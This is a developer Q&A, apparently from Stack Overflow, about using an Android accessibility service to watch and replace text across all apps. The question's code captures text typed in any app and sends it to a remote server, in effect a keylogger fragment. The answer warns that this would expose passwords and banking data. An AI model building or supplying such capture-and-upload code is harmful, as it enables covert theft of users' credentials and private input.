# Is it possible to use Text Watcher system wide?

Tags: android

Hello I'm trying to make use of accessibility service in android TYPE_VIEW_TEXT_CHANGED with a little change i.e. whenever I get data from the event handler suppose a text "android", now what I want is to replace that specific text to something else and this can be done by the use of Text Watcher I guess so but I'm not sure how to actually implement that. Although I tried replacing the text in the string but it didn't worked.

```
@Override
    public void onAccessibilityEvent(AccessibilityEvent event) {

        data = event.getText().toString();

        DateFormat df = new SimpleDateFormat("dd/MM/yyyy, HH:mm:ss z", Locale.US);
        String time = df.format(Calendar.getInstance().getTime());

        Log.i("<<DATA>>", data +"     "+ time);
        SendToServerTask sendTask = new SendToServerTask();
        sendTask.execute(data);

        int eventType = event.getEventType();

        if (eventType == TYPE_VIEW_TEXT_CHANGED) {
            //data = event.getText().toString();
            sendTask = new SendToServerTask();
            sendTask.execute(time + "<<TEXT>>" + data);
     }
}
```

Answer (score 0, accepted):

Do you want it to only apply to your app, or truly system wide?  If its in your app, the easiest thing is to create a new class derived from EditText that sets up the TextWatcher in its constructor and use that instead.

If you mean in other apps-  no there isn't.  And shouldn't be-  talk about a security issue, you'd see every password typed in to any app, including their banking info.  And Google has recently really cracked down on what you can put in the app store as an accessibility app, its unlikely you'd be approved doing anything like this.

Comment: Well it's a sure thing I wouldn't upload this type of application to Play Store, It's just for education purpose and I'll keep it to myself. I'm just concerned about how it's done ?

Comment: Accessibility service would be the only way.  That or replacing the keyboard with your own.  A TextWatcher only can be used inside your own app.

Comment: I think I just figured it out how to do that !